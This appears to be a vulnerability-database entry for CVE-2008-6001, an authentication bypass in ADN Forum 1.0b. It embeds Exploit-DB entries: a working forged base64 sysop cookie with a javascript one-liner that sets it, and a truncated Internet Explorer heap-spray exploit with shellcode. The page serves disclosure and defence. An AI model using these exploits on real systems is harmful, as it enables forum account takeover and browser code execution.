CVE-2008-6001
published 2009-01-28CVE-2008-6001: index.php in ADN Forum 1.0b and earlier allows remote attackers to bypass authentication and gain sysop access via a fpusuario cookie composed of an initial…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.45%
82.4th percentile
index.php in ADN Forum 1.0b and earlier allows remote attackers to bypass authentication and gain sysop access via a fpusuario cookie composed of an initial sysop: string, an arbitrary password field, and a final :sysop:0 string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adnforum | adnforum | <= 1.0b | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow
exploitdb·2008-12-10
CVE-2008-4844 Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow
Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow
---
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40
Exploit-DB
ADN Forum 1.0b - Insecure Cookie Handling
exploitdb·2008-09-24
CVE-2008-6001 ADN Forum 1.0b - Insecure Cookie Handling
ADN Forum 1.0b - Insecure Cookie Handling
---
adnforum
eNYe-Sec - www.enye-sec.org
Cookie is base64 based and the ascii format used is:
user:23ed4e45887ad4311ff654bd4aab6540:user:0
user:md5 pass:user:0
Programmer forgot to check the pass and only use the nick to autenticate
the user.
You can create a fake cookie likes this:
sysop:000000000000000000000000000000:sysop:0
In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA
Exploit:
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
# milw0rm.com [2008-09-24]
No writeups or analysis indexed.
http://secunia.com/advisories/18300http://www.securityfocus.com/bid/31383https://exchange.xforce.ibmcloud.com/vulnerabilities/45400https://www.exploit-db.com/exploits/6557http://secunia.com/advisories/18300http://www.securityfocus.com/bid/31383https://exchange.xforce.ibmcloud.com/vulnerabilities/45400https://www.exploit-db.com/exploits/6557
2009-01-28
Published